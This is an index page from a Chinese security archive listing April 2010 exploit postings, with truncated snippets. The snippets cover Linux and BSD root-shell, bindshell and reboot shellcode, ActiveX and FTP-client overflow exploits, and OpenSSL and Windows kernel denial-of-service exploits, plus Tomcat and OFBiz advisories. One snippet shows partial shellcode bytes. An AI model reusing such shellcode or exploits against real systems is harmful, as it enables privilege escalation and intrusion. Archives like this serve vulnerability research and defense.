首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
HP Digital Imaging (hpodio08.dll) Insecure Method Exploit
  日期:2010-04-26 14:31:47 点击:23 评论:0
# Exploit Title: HP Digital Imaging (hpodio08.dll) Insecure Method Exploit # Author: ThE g0bL!N # Version: All vesion # Tested on: Windows xp pack 2 # Code : titleExploited By : ThE g0bL!N /title BODY object id=dz classid=clsid:{697F5209-0494-11D6-A
27 bytes setuid(0) ^ execve("/bin/sh", 0, 0) shellcode
  日期:2010-04-26 14:31:00 点击:59 评论:0
#include stdio.h #include string.h /* by Magnefikko 24.04.2010 magnefikko@gmail.com Promhyl Studies :: http://promhyl.oz.pl Subgroup: #PRekambr Name: 27 bytes setuid(0) ^ execve(/bin/sh, 0, 0) shellcode Platform: Linux x86 setuid(0); execve(/bin/sh,
27 bytes setreuid(0, 0) & execve("/bin/sh") shellcode
  日期:2010-04-26 14:30:07 点击:58 评论:0
#include stdio.h #include string.h /* ?by Magnefikko ?22.04.2010 ?magnefikko@gmail.com ?promhyl.oz.pl ?Subgroup: #PRekambr ?Name: 27 bytes setreuid(0, 0) execve(/bin/sh) shellcode ?Platform: Linux x86 ? ?setreuid(0, 0); ?execve(/bin/sh, 0, 0);? ?gcc
CommView Version 6.1 (Build 636) Local Denial Of Service (BSOD)
  日期:2010-04-26 14:29:14 点击:30 评论:0
/*-------------------------------------------------------------------------*/ /** # Exploit Title : CommView Version 6.1 (Build 636) Local Denial Of Service (BSOD) # Corelan : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-030 # Date : Apri
29 Byte setuid(0) + execve("/bin/sh",...) Shellcode
  日期:2010-04-26 14:28:15 点击:62 评论:0
/* 29 byte-long setuid(0) + execve(/bin/sh,...) shellcode by Marcin Ulikowski elceef@itsec.pl */ #include unistd.h char shellcode[] = x31xdb /* xor %ebx,%ebx */ x8dx43x17 /* lea 0x17(%ebx),%eax */ xcdx80 /* int $0x80 */ x53 /* push %ebx */
Apache Tomcat v. 5.5.0 to 5.5.29 & 6.0.0 to 6.0.26 information disclosure vulner
  日期:2010-04-23 10:09:14 点击:64 评论:0
CVE-2010-1157: Apache Tomcat information disclosure vulnerability Severity: Low Vendor: The Apache Software Foundation Versions Affected: - - Tomcat 6.0.0 to 6.0.26 - - Tomcat 5.5.0 to 5.5.29 Note: The unsupported Tomcat 3.x, 4.x and 5.0.x versions
EDraw Flowchart ActiveX Control 2.3 (.edd parsing) Remote Buffer Overflow PoC
  日期:2010-04-23 10:08:41 点击:75 评论:0
#!/usr/bin/perl # # # Title: EDraw Flowchart ActiveX Control 2.3 (.edd parsing) Remote Buffer Overflow PoC # # # Vendor: EdrawSoft # # Product Web Page: http://www.edrawsoft.com # # Summary: Do you want to learn how to draw? Now you can online! Lear
EDraw Flowchart ActiveX Control 2.3 (EDImage.ocx) Remote DoS Exploit (IE)
  日期:2010-04-23 10:06:58 点击:67 评论:0
###################### EDraw Flowchart ActiveX Control 2.3 (EDImage.ocx) Remote DoS Exploit (IE) Vendor: EdrawSoft - http://www.edrawsoft.com Platform Used: MS Win XP Pro SP3 (en) / IE 8.0 CompanyNameEDrawSoft FileDescriptionEDraw Flowchart ActiveX
Windows 2000/XP/2003 win32k.sys SfnINSTRING local kernel Denial of Service Vulne
  日期:2010-04-23 10:04:57 点击:86 评论:0
Windows 2000/XP/2003 win32k.sys SfnINSTRING local kernel Denial of Service Vulnerability Effect : Microsoft Windows 2000/XP/2003 full patch Author:MJ0011 Published: 2010-04-22 Vulnerability Details: Win32k.sys in DispatchMessage when the last call t
Windows 2000/XP/2003 win32k.sys SfnLOGONNOTIFY local kernel Denial of Service Vu
  日期:2010-04-23 10:03:47 点击:67 评论:0
Windows 2000/XP/2003 win32k.sys SfnLOGONNOTIFY local kernel Denial of Service Vulnerability Effect : Microsoft Windows 2000/XP/2003 full patch Author:MJ0011 Published: 2010-04-22 Vulnerability Details: Win32k.sys in DispatchMessage when the last cal
34 bytes setreud(getuid(), getuid()) & execve("/bin/sh") Shellcode
  日期:2010-04-23 10:03:17 点击:56 评论:0
#include stdio.h #include string.h /* by Magnefikko 14.04.2010 magnefikko@gmail.com promhyl.oz.pl Subgroup: #PRekambr Name: 34 bytes setreud(getuid(), getuid()) execve(/bin/sh) shellcode Platform: Linux x86 setreuid(getuid(), getuid()); execve(/bin/
OpenSSL remote DoS
  日期:2010-04-23 10:02:33 点击:109 评论:0
/*********************************************************** * hoagie_openssl_record_of_death.c * OPENSSL REMOTE DENIAL-OF-SERVICE EXPLOIT * - OpenSSL 0.9.8m (short = 16 bit) * - OpenSSL 0.9.8f through 0.9.8m (short != 16 bit) * * CVE-2010-0740 * *
Xftp client 3.0 PWD Remote Exploit
  日期:2010-04-23 10:01:33 点击:46 评论:0
# Exploit Title: Xftp client 3.0 PWD Remote Exploit # Date: 2010-04-21 # Author: zombiefx # Software Link: http://www.netsarang.com/download/down_xft3.html # Version: Xftp 3.0 build 0238 # Tested on: Windows XP SP3 # Usage: ./xftp_exploit # The BOF
Invision power board 0-day denial of service 2
  日期:2010-04-23 09:58:44 点击:45 评论:0
============================================== Invision power board 0-day denial of service 2 ============================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` /
Invision Power Board 0-day denial of service
  日期:2010-04-23 09:53:45 点击:43 评论:0
============================================ Invision Power Board 0-day denial of service ============================================ 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / __ /'_
Apache OFBiz Multiple XSS Vulnerability
  日期:2010-04-23 09:50:08 点击:47 评论:0
======================================= Apache OFBiz Multiple XSS Vulnerability ======================================= Bonsai Information Security - Advisory http://www.bonsai-sec.com/research/ Multiple XSS in Apache OFBiz 1. *Advisory Information*
bsd/x86 reboot() shellcode 15 bytes
  日期:2010-04-23 09:47:50 点击:34 评论:0
=================================== bsd/x86 reboot() shellcode 15 bytes =================================== # Exploit Title: [bsd/x86 reboot() shellcode 15 bytes] -::OpenBSD reboot() shellcode # Date: [21-04-2010] # Author: -::beosroot # Software Lin
linux/x86 setreuid(0, 0) & execve("/bin/sh") shellcode 27 bytes
  日期:2010-04-23 09:46:34 点击:52 评论:0
=============================================================== linux/x86 setreuid(0, 0) execve(/bin/sh) shellcode 27 bytes =============================================================== #include stdio.h #include string.h /* by Magnefikko 22.04.2010
bds/x86-bindshell on port 2525 shellcode 167 bytes
  日期:2010-04-23 09:38:50 点击:46 评论:0
================================================== bds/x86-bindshell on port 2525 shellcode 167 bytes ================================================== /* -------------- bds/x86-bindshell on port 2525 167 bytes ------------------------- * AUTHOR : b
ZipGenius zgtips.dll Stack Buffer Overflow
  日期:2010-04-22 10:20:27 点击:36 评论:0
# Exploit Title : ZipGenius zgtips.dll Stack Buffer Overflow # Corelan : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-029 # Date : April 21st, 2010 # Author : corelanc0d3r, mr_me and rick2600 # Bug found by : rick2600 # Software Link : ht
共637页/12733条记录 首页 上一页 [374] [375] [376] 377 [378] [379] [380] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved